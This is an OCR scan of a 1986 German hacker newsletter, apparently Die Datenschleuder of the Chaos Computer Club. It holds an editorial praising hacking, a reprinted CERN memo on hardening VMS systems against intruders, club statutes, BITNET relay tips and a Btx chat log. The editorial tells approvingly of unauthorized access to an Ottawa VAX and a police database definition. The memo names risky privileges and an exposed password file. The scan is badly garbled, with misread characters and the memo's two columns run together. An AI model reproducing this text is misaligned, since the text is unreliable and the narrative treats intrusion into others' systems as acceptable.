umsonst, denn es zeichnet sich eine Symbiose
ab: der Hacker gemäß der Philosophie "Öffnet
lapressu« I
Di» Dat»n5chl»udBr 1&, M. Sep 1984.
-Das Hissenschaftliche Fachblatt
fucr Datenrai%ende
D'2008 Hamburg 20
Scbwenckestrats» 9S
Geonett Geol:ChaoB-Taam
Btx I *6553211
H»rausgeb»r und ViSdPGi
H»rwart Holland-Horiti
Mitarbeitar ditaar Auagabe (u.a.)
R. Schrutzlei, S. Warntry, A. Eichlar,
P. Franck, H. Gru»l, M. Kuehn.,
Andy H.-H., 5, Stahl
Eigandruck in SalbitvarJag.
Sapianbar 1986 »
iOi
die Netze - Dezentralisierung der Inlormation“
freut sich über jedes Passwort, der Betreiber
kann seinen Rechner vor wahren Gefahren
(durch Crasher, Wirtschaflkriminalität usw.)
durch erfahrene Hacker schützen lassen. Nicht
zu verachten der Lerneffekt, denn spielerisch
lässt es sich nun einmal leichter lernen, und
Bildungsförderung nimmt der Staat ja für sich
in Anspruch.
In der Realität sieht es leider noch so aus:
Softwaretests auf Gro ßrechenanlagen werden
von Hackern in Eigenregie durchgeführt. So
konnte man das auf der CeBit vorgestellte
Programmpaket ALL-IN-1 (alles eins, kon¬
zeptionell mit Lotus-1-2-3 auf Personals ver¬
gleichbar) fuer VAX-Rechner von DEC auch im
praktischen Einsatz auf einem Rechner in Ot¬
tawa bewundern. Unter dem Usernamen ORF
konnten die Vorzüge des Programmpaketes
mit einem VT-100 Emulator und einer Datex¬
verbindung genauestens untersucht werden.
Eher zufällig stiess man bei dem inoffiziellen
Softwaretest auf die Datenbankdefinition der
Ottawa Police Force (eben jener ominoese
OPF) für ein Rasterlahndungssystem (suspi-
cious flag=false). Der Test fiel von Hackerseile
her recht positiv aus, die Gegenstelle antwortet
allerdings bis heute nicht (kommentarloser
Rausschmiss). Ueberhaupt zeigen sich Rech¬
nerhersteller recht unkooperativ gegenüber
Hackern, zumindestens, was größere Kon¬
zerne angeht (“Wozu haben wir unsere teuer
bezahlten Spezialisten“). Ein weit umherge¬
reister Hacker beweist innerhalb von Minuten,
daß das Geld fuerteure Spezialisten sinnvoller
angelegt werden könnte, z.B. zur Finanzierung
einer Nui für Weiterbildungszwecke (Teilneh¬
merkennung dBildung sehraktiv). Datenreisen
bleibt immer noch eine teure Angelegenheit, es
beginnt schon bei den Postdiensten. Wir war¬
ten noch auf Billigreisen, sei es nun nach Nec¬
kermannschema ("3 Wochen Sonne im Bitnet“)
oder Rainbow-Tours (“2 1/2 Tage Superstim¬
mung im Fermilab“), warum nicht öffentliche
Datenbank-Telefonzellen mit .Terminal und
Geldeinwurf (Ortsgebühr versteht sich, und
kommt mir jetzt nicht mit Blödeltext)! Es gibt
noch viel zu tun in diesem unserem Lande, es
sind die Hacker, die sich autratfen und die
Betreiber zum Handeln zwingen! Denn der
Hilferuf soll in Zukunft nicht als “Hilfe wir haben
Hacker!“, sondern als “Hilfe, wir brauchen Hac¬
kerl!“ interpretiert werden.
DSieHILFHACk.TXT rniMP 29,M.(986
To : VMS System Managers
From : SecurityManager
Subject : Security Against Hackers _
Recently, we hava seen a number of oocurrancas intruder tried to pass {as aJready h^pens for
of peopia logging in to CERN VAXs via unautho- VXCRNA). Closing the EXCITE/INDEX gap is
rised accounts and establishing new aocounts for equally ditficult since it implies olosing access irom
themselves or altering existing accounts for their a set of X25 addressas, some of which might be
own use. Last year, this happened mainly to the legitimately employed by valid CERN users.
VXGIFT machina and on two occaslons, time was Most of the following pointe are lully described in
lost atter maliclous damage was done. the VMS V4 System Security manua'
SincethestartofFebnjary, VXCRNA hasbeen the * The most obvious first precaution it, lorall users
main targot, but hot the only one; VXDEV, to have effective passwords. Cases where user-
VXMERL, VXOMEG have been affeoted also. On name = password should be positively banned. At
VXCRNA. the effects hava been lass severe in first sight, the only risk in having such trivial pass-
terms of actual damage (although at least one wordswouldbethelossorcorruptionofthatuser’s
System crash can be traced to the running of a flies. However, once inside the System, a VMS-
privileged program by the intruder). However, se- knowledgeable intruder may well find other inter-
veral members of the Support team have had to esting possibilities. VMS is not hacker-proof, espe¬
spend a lot of time investigating these incidenfs cially if some of the following items are not re-
and repairing the damage and a few users have spected. A simple DCL command flle can be used
had their accounts made temporarily unavailable to check for such useless passwords.
when the Intruder(s) changed the password or However, even this rulels not sufficient.Using first
when the Support team suspended access to them names as passwords is almost equally useless; or
after Ihey had been used to enter the VAX. Initials; or IBM login Codes. System managers
Wa will leave aside for now the quest'on of how should enforce minimum length passwords, say a
such “hackers" first get access to privileged ac- minimum of 5 oharaoters. In the limif, the use of
counts in a given machine. Once they get such password expirytimes mightbenecessary.forcing
access, these people are very knowledgeable regulär changes of password. This last item, for-
about VMS and they can set themselves up many cing password changes, might be thought to re-
otherwaysinto the System. Ithastaken mucheffort duce the user-friendliness of VMS (as do most of
toreach the Stage wnerewe now believethat they the suggestions in this paper), but it would be
can do no further harm Inside VXCRNA and even usefui to traca accounts unused for a long time;
now.weacceptthattheremaystillbewaysinwhich these are exactlythe accounts that hackerspick on
they can log in. to adapt for their own use.
Who are these people and how do they access Where a user has some special privilege (and this
CERN. Apart from the ocoasional hackerwhomay should bekeptto a minimum), such regulär chan-
be a user on some connected System who gets ges should be enforced and perhaps the minimum
bored late at night and tries to ses what he can length should be longer. Apart from the obvious
reaoh and whatfun he can have, thereseems tobe Privileges to be careful with (SETPRV, SYS*,
a Club based in Germany oalied the "ohaos club“ CMKRNL, BYPASS. OPER, etc) are DETACH and
whose colleotive hobby is hacking Systems con- READALL. The first gives its owner the possibiliw
nected to public X25 networks. We have identified to issue a RUN/UIC= command where the UIC
one memoer of this dub in Düsseldorf and the could be a System IDI The second gives write
"working alias" of a second in Berlin. We are cur- access to all nie headers, thus allowing its owner
rently investigating what Steps we can take to to change a fila protection, for example.
ourtail their anB-social activities. * Users should NOT keep passwords in flies on
This paper lists a few hints on how to make Systems disc, for example to help them log in to another VAX
a little more secure. It must be emphasised that across the network. This compromises not only the
ALLCERNsystemsmuslbeprotected.Thepeople accountbeing hacked, buttheoorresponding VAX
doing this hacking are very ingenious. They know also.
all about networks. We have seen evidenoe that * Some terminals allow their owners to störe cha-
they enter CERN via one System and use DECNET racter strings in memory to be activated on a single
to get to their real target System. Even If all CERN or multiple keystroke(s). Unless you can be sure
Systems were fully protected, it might not be that your terminal is totally secure (either in a
enough. There would still remain two large gaps permanenfly locked Office or at home and out of
through which they might pass. One is via the reach of the childrenll), then you should not störe
CERN EXCITE network where they would log Inlo login sequences in the memory of your terminal.
INDEX and then connect to any VAX; the second * The BACKUP program Stores the command
Is Ihrouqh a System outside CERN, forexample, on String used to create a backup save set in the save
INFNET and then into CERN via DECNET. set itself. If you use DECNET to create a backup
Stopping the second of these might be possible if save set and you include the usemame and pass-
weencourage the System managers of all Systems word in the command string in the form node''u-
on the network to take the same Steps asdescribed semame password"::... then the password will ap-
In this note with the threaf that wewouldbeobliged ^ pear in olear text in the save set. We have oom-
to dose the link to any System though which an i' plained to the author ol BACKUP about this but
there Is little chance of a solution.
* From time to time, bugs or seourity gaps are
reported in particular versions of VMS. These
should be closed as soon as a fix Is avallable. For
example, under VMS x.x, any user in the System
can xxxxxxxxxxxxxxxxxxxxxxxxx to the System
xxxxxxxxxxxxxxxx(andonofher xxxxxxx
xxxxxxxxxx in the System). This is equivalentto the
xxxxxx xxxxxxxxx and can lead to abuse. The
published protection against this is to set the fol¬
lowing command into the
xxxxxxxxxxxxxxxxxxxxxxxx
Sxxxxxxxxxxxxxxxxxxxxx
$xxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxx
This bug Is fixed in VMS x.x.
* System managers raight consider restricted ac-
cBss to certain privileged accounts during nights
and Weekends. This is easy to Implement using the
primary/secondaiy options in the authorisation flle
and a command flle run at regulär times. Accounts
such as xxxxxxx and xxxxxxxxxxxx should allways
be disabied when not in active use and their pass¬
words Should allways be changed from the VMS
defaulf. However, does the S YSTE M account need
to be open all weekend when you know it will not
be needed until Monday? Perhaps such accounts
should be disabied for access in NETWORK mode
or from DIALUP lines. And so on.
A particular case of this is the xxxxx account. ln
general, xxxxxxxxxxxxxx are not careful with their
passwords, especially on a site with many VAXs.
It is strongly suggesfed that xxxxx should be ge-
nerally disabied unless xxxxxxxxxxxxxx have been
called A trivial command Ille run by any privileged
user (OPS or SYSTEM) could be written to enable
It. If you wanl xxxxx xxxxxxx to be able to look at
your error log without your enabling their account,
they could be given a non-privileged account and
access to the error log via an access confrol entry.
While xxxxxxxxxxxxx might (will) not like this, if is
Standard practice in many Digital Offices as well as
atsome usersites.
* Some flies should be protected by seourity access
control entriss such that certain types of access to
them are logged. Examples would be SYSUAF.-
DAT, VMSIMAGES.DAT, the NEr.DAT flies in
SYS$SYSTEM. all page, swap and dump flies. All
thes flies have no need to have any 'World" access,
not even read. The RIGHTSLISf.DAT Ille howe¬
ver, does need world-read access but could have
an access control entry for other types of access.
Finally, any xxxxxx and xxx xxxxx xxxxx should
have no worid access since they may xxxxxxx xxxx
xxxxxxxxx.
* Some Images may be left generally accessible
but instalied with accounting selectively enabied so
that their use is recorded. Examples here would
Include INSTALL. NCP, AUTHORIZE, ACCOUN¬
TING. The aim is not to stop them being used (a
ciever hacker could easily get round this) but to be
able to see when they are used and by whom.
* The various VMS xxxxxxxx xxxxxx should be
xxxxxxx. These will log breakin attempts, changes
to the authorisation flle and so on. These can be
linked to CERN-wriften programs which will, for
example, kill any unauthorised process which tries
to change the authorisation flle, dose a DECNET
link which is being used to hack the System, send
warning messages to a given account or accounts
when such incidents occur; and so on. These
programs are avallable from xxxxxxxxxxx
* If you have xxxxxxxxxxxxxxx, your System could
be used asa“portof entry"forthese Hackers. There
exists a Standard xxxxxx utility called xxxxxxxxxxxx
which will allow the System managerto set up a list
of DTE (X25 addresses) to or from which calls are
allowed orexcluded; allst of users who are allowed
to use X25 to gain access to or from a remote
System; and a list of "Objects" (programs) which are
accessible via X25 for remote users. Although this
might seem a little heavy - and the dooumentation
may need to be read several times before it is
understood - X25 System managers are strongly
encouraged to consult the xxx documentation for
more details on xxxxxxxxxxxx.
* Other network products, e.g. J-NET, may have
their own security gaps. We have done some
simple tesfs on TCP/IP and EAN and found the
following.
In TCP/IP, the System manager can declare Server
processes. It seems that TCP/IP Starts such pro-
cesses with whatever privilege It itself is Instalied
with. Since this usually indudes CMKRNL, your
System is thus vulnerable to simple coding errors
by the author of the Server, without even consi-
dering the dangers of hackersi We are investiga¬
ting this.
EAN has an even bigger loophole. When users
register with EAN, they are asked for an EAN
password. This Is then stored In a flle on the users
account with a Standard name - in olear text.
Further, this Ille is created by EAN with worid read
privilege! Although users are requested to choose
a different password to their VMS passwords, ma¬
ny use the same password. We are investigating
making this flle less accessible. System managers
with EAN instalied are Invited to contact me for the
name of this flle.
* If you suspect that your System hasbeen hacked,
Isolate the account used as soon as possible.
Making it xxxxxxx is not enough since batch and
network Jobs can still pass. Use the xxxxxxxxx
qualifier in AUTHORIZE. Also, check that the hac¬
ker has not altered other records if you suspect he
had privilege. xxxxxxxxxxxxx has a trivial com¬
mand flle to check for this. Finally, check that
Strange flies wäre not created in the "attacked"
account. -—
(Special Thanx to A.S.) O
KirdEr an die Macht
"The reach of children” steht für
"Gefahrenzone" bei Systefr.-Managern,
die Hacken als antisoziale Tätigkeit
schildern. Das widerlegt "Hilfe-
Hacker" in dieser Hosgabe. "2 bis 3?.
offener . Komiriuni kat i on, frei und
unzensiert auf allen Medien" fordert
MultiMediaGruppe MinusDeltaf. Diesen
Anteil haben Hacker auf den
Rechnersystemen - auch auf VAXen
noch längst nicht erreicht.
wau
Die Informationsgesellschaft unserer Tage ist ohne Computer nicht mehr denkbar. Die Einsatzmöglich¬
keiten der automatisierten Datenverarbeitung und Datenübermittlung bergen Chancen, aber auch Ge¬
fahren für den Einzelnen und für die Geseilschaft. Informalions-und Kommunikationstechnologien ver¬
ändern das Verhältnis Mensch-Maschine und der Menschen untereinander. Die Entwicklung zur Infor¬
mationsgesellschaft erfordert ein neues Menschenrecht auf weltweite ungehinderte Kommunikation.
Der Chaos Computer Club ist eine galaktische Gemeinschaft von Lebewesen, unabhängig von Alter,
Geschlecht und Rasse sowie gesellschaftlicher Stellung, die sich grenzüberschreitend für Informations¬
freiheit einsetzt und mit den Auswirkungen von Technologien auf die Gesellschaft sowie das einzelne
Lebewesen beschäftigt und das Wissen um diese Entwicklung fördert.
§ 1 Name, Sitz, Geschäftsjahr
(1) Der Verein führt den Namen “Chaos Computer
Club“. Der Verein wird in das Vereinsregister ein¬
getragen und dann um den Zusatz “e.V.“ ergänzt.
Der verein hat seinen Sitz in Hamburg.
(2) Das Geschäftsjahr beginnt am 1. März jeden
Kalenderjahres.
§ z Zweck und Gemeinnützigkeit
(1) Der Club fördert und unterstützt Vorhaben der
Forschung. Wissenschaft & Bildung, Erziehung,
Kunst & Kultur, sowie der Völkerverständigung im
Sinne der Präambel oder führt diese durch.
Der Vereinszweok soll unter anderem durch fol¬
gende Mittel erreicht werden:
1. regelmäßige öffentliche Treffen und Informa¬
tionsveranstaltungen
2. Veranstaltung undfoder Fördemng internatio¬
naler Congresse, Treffen, sowie Telekonferenzen
3. Herausgabe der Zeitschrift ‘'Datenschleuder'
4. Öffentlichkeitsarbeit und Teiepublishing in allen
Medien
5. Arbeits- und Erfahrungsaustauschkreise
6. Informationsaustausch mit den in der Oaten-
schutzgesetzgebung vorgesehenen Kontrollor¬
ganen
7. Hacken
8. Hilfestellung und Beratung bei technischen und
rechtlichen Fragen im Rahmen der gesetzlichen
Möglichkeiten für die Mitglieder
(2) Der Club ist gemeinnützig; er dient aus¬
schließlich und unmittelbar der Volksbildung zum
Nutzen der Allgemeinheit. Er darf keine Gewinne
erzielen; er ist selbstlos tätig und verfolgt nicht in
erster Linie eigenwirlschaftliche Zwecke. Die Mittel
des Club werden ausschlie ßlich und unmittelbarzu
den satzungsgemäßen Zwecken verwendet. Die
Mitglieder erhalten keine Zuwendung aus den Mit¬
teln des Clubs. Niemand darf durch Ausgaben, die
dem Zwecke des Clubs fremd sind oder durch
unverhältnismäßig hohe Vergütungen begünstigt
werden.
§ 3 Mitgliedschaft
(1) Ordentliche Clubmitglieder können natürliche
und juristische Personen, Handelsgesellschaften,
nicht rechtsfähige Vereine sowie Anstalten und
Körperschaften des öffentlichen Rechts werden.
(2) Die Beitrittserklärung erfolgt schriftlich oder
fernschriftlich gegenüber dem Vorstand. Über die
Annahme der Beitrittserklärung entscheidet der
Vorstand. Die Mitgliedschaft beginnt mit der An¬
nahme der Beitrittserklärung.
(3) Die Mitgliedschaft endet durch Austrittserklä¬
rung. durch Tod von natürlichen Personen oder
durch Audösurtg und Erlöschen von juristischen
Personen, Handelsgesellschaften, nicht rechtsfä-'
higen Vereinen sowie Anstalten und Körper¬
schaften des öffentlichen Rechtes oder durch Aus¬
schluß; die Beitragsptlicht tür das laufende Ge¬
schäftsjahr bleibt hiervon unberührt.
(4) Der Austritt ist nur zum Schluß eines Ge¬
schäftsjahres zulässig; die Austrittserklärung muß
spätestens drei Monate vor Ablauf des Ge¬
schäftsjahres gegenüber dem Vorstand schriftlich
abgegeben werden.
(5) Die Mitgliederversammlung kann solche Per¬
sonen, die sich besondere Verdienste um den Club
oder um die von ihm verfolgten satzungsgemäßen
Zwecke erworben haben, zu Ehrenmitgliedern er¬
nennen. Ehrenmilgliederhaben alle Rechte eines
ordentlichen Mitglieds. Sie sind von Beitragslei¬
stungen befreit.
§ 4 Rechte und Pflichten der Mitglieder
(1) Die Mitglieder sind berechtigt, die Leistungen
des Clubs in Anspruch zu nehmen.
(Z) Die Mitglieder sind verpflichtet, die satzungs¬
gemäßen Ävecke des Clubzu unterstützen und zu
fördern. Sie sind verpflichtet, die festgesetzten
Beiträge zu zahlen.
§ 5 Ausschluß eines Mitgliedes
(1) Ein Mitglied kann durch Beschluß des Vor¬
standes ausgeschlossen werden, wenn es das
Ansehen des Clubs schädigt, seinen Beitrags¬
verpflichtungen nicht nachkommt oder wenn ein
sonstiger wichtiger Grund vorliegt. Der Vorstand
muß dem auszuschließenden Mitglied den Be¬
schluß in schriftlicher Form unter Angabe von
Gründen mitteilen und ihm auf Verlangen eine
Anhörung gewähren.
(2) Gegen den Beschluß des Vorstandes ist die
Anrufung der Mitgliederversammlung zulässig. Bis
zum Beschluß der Mitgliederversammlung ruht die
Mitgliedschaft.
§ 6 Beitrag
(1) Der Club erhebt einen Aufnahme- und Jah¬
resbeitrag. Er ist bei der Aufnahme und für das
Geschäftsjahr im ersten Quartal des Jahres im
voraus zu enfrichfen. Das Nähere regelt eine Bei¬
Dokunentation
tragsordnung.die von der Mitgliederversammlung
beschlossen wird.
(2) Im begründeten Einzelfall Kann für ein Mitglied
durch Vorstandsbeschluß ein von der Beitrag¬
sordnung abweichender Beitrag festgesetzt wer¬
den.
5
§ 7 Organe des Clubs
Die Organe des Clubs sind
1. die Mitgliederversammlung
2. der Vorstand
§ 8 Mitgliederversammlung
(1) Oberstes Beschlußorgan ist die Mitglieder¬
versammlung. Ihrer Beschlußfassung unterliegen
1. die Genehmigung das Finanzberichtes
2. die Entlastung des Vorstandes,
3. die Wahl der einzelnen Vorstandsmitglieder,
4. die Bestellung von Finanzprüfern,
5. Satzungsänderungen.
6. die Genehmigung der Beitragsordnunm
7. die Richtlinie über die Erstattung von Reiseko¬
sten und Auslagen,
8. Anträge des Vorstandes und der Mitglieder,
g. die Ernennung von Ehrenmitgliedern,
fO.die Auflösung des Clubs.
(3) Oie Mitgliederversammlung ist beschlußfähig,
wenn mindestens fünfzehn Prozent aller Mitglieder
anwesend sind. Beschlüsse sind jedoch gültig,
wenn die Beschlußfähigkeit vor der Beschlußfas¬
sung nicht angezweifelt worden ist.
(4) Beschlüsse über Satzungsänderungen und
über die Autlösung des Clubs bedürfen zu ihrer
Bechtswirksamkeit der Dreiviertelmehrheit der an¬
wesenden Mitglieder. In allen anderen Fällen ge¬
nüg! die einfache Mehrheit.
(5) Jedes Mitglied hat eine Stimme. Juristische
Personen haben einen Stimmberechtigten schrift¬
lich zu bestellen.
(6) Auf Antrag eines Mitgliedes ist geheim abzu¬
stimmen. Über die Beschlüsse der Mitgliederver¬
sammlung ist ein Protokoll anzufertigen, das vom
Versammlungsleiter und dem Protokollführer zu
unterzeichnen ist; das Protokoll ist allen Mitglieder
zugänglich zu machen und auf der nächsten Mit¬
gliederversammlung genehmigen zu lassen.
(6) Der Schatzmeister überwacht die Haushalts¬
führung und verwaltetdas Vermögen des Clubs. Er
hat auf eine sparsame und wirf sohaftliche Haus¬
haltsführung hinzuwirken. Mit dem Ablauf des Ge¬
schäftsjahres stellt er unverzüglich die Abrech¬
nung sowie die Vermögensübersicht und sonstige
Unterlagen von Wirtschaft lichem Belang den Fi¬
nanzprüfern des Clubs zur Prüfung zur Verfügung.
(7) Die Vorstandsmitglieder sind grundsätzlich eh¬
renamtlich tätig; sie haben Anspruch aut Erstat¬
tung notwendiger Auslagen im Rahmen einer von
der Mitgliederversammlung zu beschließenden
Richtlinie über die Erstattung von Reisekosten und
Auslagen.
(8) Der Vorstand kann einen "Wissenschaftlichen
Beirat“ einrich len, der für den Club beratend und
unterstützend tätig wird; in den Beirat können auch
Nicht-Mitglieder berufen werden.
§ 10 Finanzprüfer
(1) Zur Kontrolle der Haushaltsführung bestellt die
Mitgliederversammlung Finanzprüfer. Nach
Durchführung ihrer Prüfung geben sie dem Vor¬
stand Kenntnis von ihrem Prüfungser gebnis und
erstatten der Mitgliederversammlung Bericht.
(2) Die Finanzprüfer dürfen dem Verstand nicht
angehören.
§ 11 Erfa-Organlsatlon
(1) Der Club bildet zur Durchführung seiner Auf¬
gaben regionale Erfahrungsaustauschkreise
(Erla-Kreise). Sie bestimmen ihre Organisations¬
struktur selbst.
(2) Aufgabe der Erfa-Kreise ist ferner,
1 . die Entscheidungsbildung im Club zu fördern
und vorzubereiten,
2. Mitglieder für den Club zu werben.
(3) Beabsichtigt ein Erta-Kreis, bestimmte Themen
oder Aktivitäten mit überregionalen Bezug an die
Öffentlichkeit zu tragen, ist dies vorher mit dem
Vorstand des Clubs abzustimmen.
(4) Jeder Erfa-Kreis bestimmt einen Erfa-Kreis-
Vertreter. Die Erfa-Kreise sollten sich eine Orga¬
nisationsstruktur geben, die mit dem Erfa-Beirat
abzustimmen ist.
§ 9 Vorstand
(1) Der Vorstand besteht aus sieben Mitgliedern:
1. den Vorsitzenden,
2. zwei stellvertretenden Vorsitzenden,
3. dem Schatzmeister,
4. zwei Beisitzern und
(2) Vorstand im Sinne des § 26 Abs. 2 BGB sind die
Vorstandsmit glieder. Die Vertretungsmacht ist
durch Beschlüsse des gesam ten Vorstandes be¬
grenzt.
(3) Der Vorstand beschließtmitderMehrheit seiner
satzungsge mäßen Mitglieder. Sind mehr als zwei
Vorstandsmitglieder dauernd an der Ausübung
ihres Amtes gehindert, so sind unverzüglich Nach¬
wahlen anzuberaumen.
(4) Die Amtsdauerder Vorsfandsmitgliederbeträgt
zwei Jahre; Wiederwahl ist zulässig.
(5) Der Vorstand ist Dienstvorgesetzter aller vom
Club angestel/ len Mitarbeiter; er kann diese Auf¬
gabe einem Vorstandsmitglied übertragen.
§ 12 Erfa-Belrat
(1) Der Erfa-Beirat besteht aus den Erfa-
Vertretern, die Clubmitglieder sind.
(2) Der Erfa-Beirat schlägt der Mitgliederver¬
sammlung aus seiner Mitte den Erfa-
Repräsentanlen zur Wahl in den Vorstand vor.
(3) Der Erfa-Beirat wirkt bei der Führung der Club¬
geschäfte beratend und unterstützend mit. Er hat
dabei insbesondere die Aufgabe, die Belange der
Erfa-Kreise zu vertreten.
§ 13 Auflösung des Clubs
Bei der Auflösung des Clubs oder bei Wegfall
seines Zweckes fällt das Clubvermögen an eine
von der Mitgliederversammlung zu bestimmende
Körperschaft des öffentlichen Rechts oder eine
andere steuerbegünstigte Körperschaft zwecks
Verwendung für die Volksbildung.
Hamburg, den 16. Februar 1986
Bitnepp
“FQr Immer wurde der Betrieb des Relays an der Cornell Universität in New York einge¬
stellt“; so berichtete die dpa-Meldung vom ....
Wir wissen nicht, wer Ihnen diese freundliche Mitteilung überreicht hat, wir empfehlen
’SEND/REM CORNELLC RLY’ (ehemals CORNELLC MAS).
Angeblich haben esdie Hackerdoch geschafft,
über BITNET ganze Rechnernetze herunter¬
zufahren und wichtige Dateien “unwissentlich
vernichtet“. Wilde Spekulationen über Pla¬
nungen “elektronischer Bombeneinschläge“
wurden in den Pressemeldungen verlaulbart.
Die “Hackergefahr kann nach Ansicht der Cor¬
nell Uni nicht so groß gewesen sein, da das
System bereits nach etwa drei Monaten unter
geringfügig geändertem Namen wieder am
Netz hing.
Zu EARN/BITNET, um das es in diesem Zu¬
sammenhang geht einige sachliche Anmer¬
kungen:
Tatsache ist, daß Dialoge auf EARN/BITNET
(von IBM gesponsert) mittels Konferenzproto¬
kollen ständig überwacht werden können und
auch wurden.
BITNET verbindet nahezu sämtliche Universi¬
täten und Forschungszentren in den USA und
Europa (über EÄRN = European Academic
Research Network) und bietet JEDEM Benut¬
zer der Rechner die Möglichkeit, Dateien mit
JEDEM Benutzer desselben oder eines an¬
deren Rechners übers Netz auszutauschen.
Zur Förderung der Kommunikation wurde ein
sog. “Interchat Relay Network“ eingeführt, das
online Konferenzscnaltungen erlaubt. So ha¬
ben sich zum Beispiel die Wissenschaftler, die
die Giotto-Sonde zur Erforschung des Kome¬
ten Halle/ überwachten in der Zeit, in der sie
nur darauf warteten, daß irgendetwas schief¬
geht die Langeweile bei einem lockeren Chat
vertrieben.
Eben auf diesen “Relays“ haben sich auch
deutsche und Schweizer Hacker etabliert, um
an den Gesprächen konstruktiv teilzunehmen.
Es ist also wie gesagt nicht möglich, auf frem¬
den Rechnern Dateien zu löschen oder gar
Betriebs^stemkommandos auszuführen, d.h.
die dpa-Pressemeldung lieferte einfach irre¬
führende Informationen.
Doch zurückzu BITNET/EARN: DerSchweizer
Zentralknoten CEARN (Genf) ist mit Darm¬
stadt, Paris, Rutherford, Rom und Stockholm
direkt verbunden und führt via diese Knoten
theoretisch direkt in die USA, z.B. an die Ge¬
orge Washington University in New York, prak¬
tisch klappt die Verbindung nicht immer rei¬
bungslos (Murphy schlug bereits diverse Male
zu). An EARN hängen z.B. (fast) alle deutschen
Unis, das DESY in Hamburg, das DFVLR in
München, Gern in der Schweiz und einige NA¬
SA Rechner. Für Ottonormalforscher sind de¬
rartige interessante Perspektiven völlig ver¬
schlossen, Heinz Hacker wird von Netzbetrei¬
bern immer noch ungern gesehen (“Fritz is
online").
EARN/BITNET ist für jeden eine sehr interes¬
sante Sache, denn neben lockeren Chats fin¬
det speziell in den Konferenzen ein reger
Know-How-Austausch statt, über letzteres ver¬
fügen Hacker unbestritten !
Nebenbei: EARN wird von der 3-Buchstaben-
Firma bis Ende 1987 finanziert, so daß es
natürlich für diverse Forschungsinstitute in
Deutschland kein Problem ist, sich (via Datex-
L) daran zu beteiligen, zumindest solange es
sich um SNA-(un)fähige Systeme handelt.
Nicht erst ab 1988 gilt also für IBM: “Let’s EARN
some moneyl“, von der parasitären Know-
How-Beschaffung ganz abgesehen.
Warum eigentlich den Hackern, den wahren
Verfechtern der freien Kommunikation der Zu¬
griff verweigert werden soll, ist nicht einzuse¬
hen, denn unbestritten bleibt doch der For¬
schungsauftrag der Hacker, der eine Teilnah¬
me an diesem Netz geradezu zwingend vor¬
schreibt I
Zum Schluß noch ein paar Tips für jene Da¬
tenreisenden, die über einen EARN oder BIT¬
NET Zugang verfügen:
Auf VAXen: SEND/REM CEARN RELAY in
Europa oder SEND/REM BITNIC RELAY in
USA, um an den Konferenzen teilzunehmen,
dann /h für Help.
Auf IBM/VM Kisten: TELL RELAY AT CEARN
/h usw.l Empfehlenswert: das Relay an der
Cornell-Uni sollte bevorzugt behandelt werden
(CORNELLC RLY), ist aber nur zwischen 9:00
pm und 6:00 am lokaler Zeit erreichbar.
Aber keine elektronischen Bombeneinschläge
planen oder gar Giotto auf dem Mars landen
lassen, sonst wird die Cornell-Uni keine wei¬
teren Studienbewerbungen mehr annehmen.
FRIMP & VIC, (the Networker Crew)
Mailboxen im
Btx-Wartesaal
über externe Rechner wurde In Bild¬
schirmtext eine DIalogmögllchkeit ge¬
schaffen.
Einen guten Eindruck gibt der folgende
Dialogmitschnitt; die Btx-übiiehen
Verwaltungs- und Farbinformationen wur¬
den gestrichen.
Teilnehmer waren hallo und chaos-team
001: Dialog-Beginn 14:55:26
hallo aus HH
hallo aus hh, hier ist das chaos-team.
und welche Mission treibt euch hierher?
Wirtesten die Wartezeiten
(abgeschickt 14:58:22:angezeigt wurde durch
Übermittlungsfehler “Eilgabe abgeschickt“
statt “Eingabe abgesohickt“. Dia Antwort traf
um 15:01:03 ein.)
na dann viel Spaß. Testet mal auch, wie oft
man hier rausfliegt. Ich wurde heute schon 6
mal hinausbefördert, aber das glauben die
Veranstalter mir nicht.
ß da ist der msg dienst im postsystem schneller
und bald wohl auch preiswerter
ganz sicher, aber nicht das Angebot
wie endet der dialog, wenn du nicht mehr da
bist (rausfliegst) für uns, merkt das System
das?
mein Partner sendet noch eine Mitt. ab, die
nicht ankommt, ich erhalte eine Postseite mit:
die Verbindung wurde unterbrochen aus tech¬
nischen Gründen.
ist bekannt, welche gebühren geplant sind?
ich weiß nur das, was am Anfang gesagt wird.
0,08 pro Dialogschritt und 0,50 für den Ein¬
stieg.
0,07 kostet eine versendete msg über mail-
boxsysteme, der dialog dort in echtzeit 25 pfg
die minute - welchen namen hat die system¬
zentrale?
weiß nicht, aber da sind meistens Beobachter
im Programm unter ICR, Baff oder eine Kom¬
bination davon.
danke, dürfen wir diesen dialog veröffentli¬
chen?
gerne, wenn er aussagekräftig genug ist
ok, wie beendet man den dialog?
die nächste msg nicht absenden
Um 15:22:14 konnten wir den zweiten und
vorerst letzten Dialog beginnen. EinTestlesen
des Artikels dauerte xx Sekunden; per Btx ca.
20 Minuten.
/xiAvB/btxnibx16.wau 860401 1911
Glaube an neue Dienste
Btx-Schwund statt Schwung bringt die neue
Gebührenordnung. Zum Rückgang der An¬
bieterzahlen meinte der Leiter des Fernmel¬
deamtes in N. (Q:sz860701 s26): “Man muß an
neue Dienste glauben...“
CCC auf kommerziellen Boxen
- Rückschlag für private Be¬
treiber ?
"...aber in den Zentren keimt es. Einige Sysops ge¬
stalten ihre rmationssysteme bewuat, sie agieren als
elektronische Verieger."
So stand es in 0514 in der Ankündigung des Chaos
Communication Congress '85. Den lokalen Maiiboxen
wurde steigende Qualität beseheinigt, das Bewusstsein
der Betreiber für die Erfordernisse der Kommunika¬
tionsgesellschaft sei gestiegen.
Tatsächlich gibt es überall in diesem unseren Lande
Sysops, für die ihre Mailbox mehr ist, als nur eine
elektronische Muilhalde. Diese Betreiber investieren
sehr viel Zeit und noch mehr Geld in die Entwicklung der
lokalen Systeme, um eine Angleiohung an den Stan¬
dard der kommerziellen Boxen zu erreichen, ja diesen
Standard in der Hinsicht zu ubertreHen, daa sie dem
alten Grundsatz treu bleiben “Soviel Information wie
möglich, so preiswert wie möglich". Da werden mal eben
10.000 DM in Hardware gesteckt, hunderte von Ar¬
beitsstunden In Programmentwicklung investiert. Trei¬
bende Kraft bei dieser Entwicklung war dabei auch der
CCC, der immerwieder unablaaig forderte, die lokalen
Systeme muaten weg von der CB-Mullbox, hin zum
(semi-) professionellen Standard. Undtatsachlich fielen
diese Anregungen bei etlichen Betreibern auf frucht¬
baren Boden, inzwischen entstehen bundesweit überall
Systeme, die aut mehreren Leitungen gleichzeitig er¬
reichbar sind, teilweise auch über Patlex-D.
Das Hauptproblem für die Betreiber dieser Systeme ist
dabei, dem Otto-No rmal-User klarzumachen, daa diese
